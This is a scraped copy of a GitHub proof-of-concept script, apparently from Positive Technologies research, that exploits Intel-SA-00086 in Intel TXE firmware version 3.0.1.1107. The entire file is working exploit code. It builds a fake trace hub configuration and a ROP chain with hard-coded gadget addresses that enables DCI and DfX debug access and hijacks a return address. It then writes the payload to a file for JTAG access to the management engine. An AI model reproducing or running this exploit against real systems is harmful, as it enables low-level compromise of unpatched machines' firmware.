IntelTXE-PoC/me_exp_bxtp.py at master · ptresearch/IntelTXE-PoC · GitHub
source link: https://github.com/ptresearch/IntelTXE-PoC/blob/master/me_exp_bxtp.py
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
112 lines (96 sloc) 4.11 KB
#!/usr/bin/env python # JTAG activator for Intel ME core via Intel-SA-00086 by Mark Ermolov (@_markel___) # Maxim Goryachy (@h0t_max) # # Details: https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00086.html # http://blog.ptsecurity.com/2018/01/running-unsigned-code-in-intel-me.html # https://github.com/ptresearch/IntelME-JTAG
from __future__ import print_function import argparse import struct
descr = "Intel-SA-00086 JTAG-PoC for TXE (ver. 3.0.1.1107)" STACK_BASE = 0x00056000 SYSLIB_CTX_OFFSET = 0x10 STACK_OFFSET = 0x14 BUFFER_OFFSET = 0x380 SYS_TRACER_CTX_OFFSET = 0x200 SYS_TRACER_CTX_REQ_OFFSET = 0x55c58 RET_ADDR_OFFSET = 0x338
def GenerateTHConfig(): print("[*] Generating fake tracehub configuration...") trace_hub_config = struct.pack("<B", 0x0)*6 trace_hub_config += struct.pack("<H", 0x2) trace_hub_config += struct.pack("<L", 0x020000e0) trace_hub_config += struct.pack("<L", 0x5f000000) trace_hub_config += struct.pack("<L", 0x02000010) trace_hub_config += struct.pack("<L", 0x00000888)
return trace_hub_config
def GenerateRops(): print("[*] Generating rops...") #mapping DCI rops = struct.pack("<L", 0x0004a76c) #side-band mapping rops += struct.pack("<L", 0x0004a877) #pop 2 arguments rops += struct.pack("<L", 0x000706a8) #param 2 rops += struct.pack("<L", 0x00000100) #param 1 #activating DCI rops += struct.pack("<L", 0x000011BE) #put_sel_word rops += struct.pack("<L", 0x0004a876) #pop 3 arguments rops += struct.pack("<L", 0x0000019f) #param 3 rops += struct.pack("<L", 0x00000000) #param 2 rops += struct.pack("<L", 0x00001010) #param 1 #activating DfX-agg rops += struct.pack("<L", 0x0004a76c) #side-band mapping rops += struct.pack("<L", 0x0004a877) #pop 2 arguments rops += struct.pack("<L", 0x00070684) #param 2 rops += struct.pack("<L", 0x00000100) #param 1 #setting personality rops += struct.pack("<L", 0x000011BE) #put_sel_word rops += struct.pack("<L", 0x0004a876) #pop 3 arguments rops += struct.pack("<L", 0x0000019f) #param 3 rops += struct.pack("<L", 0x00008400) #param 2 rops += struct.pack("<L", 0x00000003) #param 1
rops += struct.pack("<L", 0x0003d25b) rops += struct.pack("<L", 0x00055ff0) rops += struct.pack("<L", 0x00099010) rops += struct.pack("<L", 0x00000000)*4 rops += struct.pack("<L", 0x00009dcc) rops += struct.pack("<L", 0x00000000)*3 rops += struct.pack("<L", 0x0003d25d) rops += struct.pack("<L", 0x00000000) rops += struct.pack("<L", 0x00000001) rops += struct.pack("<L", 0x00050004) rops += struct.pack("<L", 0x00055d34) rops += struct.pack("<L", 0x00035674) rops += struct.pack("<L", 0x00000000)*4 rops += struct.pack("<L", 0x00055d3c) rops += struct.pack("<L", 0x00035015) rops += struct.pack("<L", 0x00000000) rops += struct.pack("<L", 0x000260A1)
return rops
def GenerateShellCode(): syslib_ctx_start = SYS_TRACER_CTX_REQ_OFFSET - SYS_TRACER_CTX_OFFSET print("[*] Generating SYSLIB_CTX struct (stack base: %x: syslib ctx base: %x)..." % (STACK_BASE, syslib_ctx_start)) data = GenerateTHConfig() init_trace_len = len(data) data += GenerateRops() data += struct.pack("<B", 0x0)*(RET_ADDR_OFFSET - len(data)) data += struct.pack("<L", 0x00016e1a) data += struct.pack("<L", STACK_BASE - BUFFER_OFFSET + init_trace_len)
data_tail = struct.pack("<LLLLL", 0, syslib_ctx_start, 0, 0x03000300, STACK_BASE-4) data += struct.pack("<B", 0x0)*(BUFFER_OFFSET - len(data) - len(data_tail)) data += data_tail return data
def ParseArguments(): parser = argparse.ArgumentParser(description=descr) parser.add_argument('-f', metavar='<file name>', help='file name', type=str, default="ct.bin") return parser.parse_args().f
def main(): print(descr) file_name = ParseArguments() data = GenerateShellCode() print("[*] Saving to %s..." % (file_name)) f = open(file_name, "wb") f.write(data) f.close if __name__=="__main__": main()
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK